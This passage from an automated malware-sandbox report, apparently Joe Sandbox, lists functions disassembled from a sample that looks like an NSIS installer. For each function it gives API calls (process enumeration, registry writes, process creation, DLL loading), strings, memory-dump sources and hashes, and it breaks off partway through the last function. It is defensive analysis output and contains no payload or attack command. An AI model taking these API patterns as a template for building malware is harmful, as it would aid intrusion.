Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

EnumProcessModules, xrefs: 0040648A
Unknown, xrefs: 004064FC
Process32FirstW, xrefs: 004065BD
GetModuleBaseNameW, xrefs: 00406494
Process32NextW, xrefs: 004065C8
Module32FirstW, xrefs: 004065D3
Module32NextW, xrefs: 004065DE
EnumProcesses, xrefs: 00406482
PSAPI.DLL, xrefs: 00406464
CreateToolhelp32Snapshot, xrefs: 004065B5
Kernel32.DLL, xrefs: 0040659B

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

@%F, xrefs: 004042A7
open, xrefs: 004042DF
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
NUL, xrefs: 00406A9E
F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
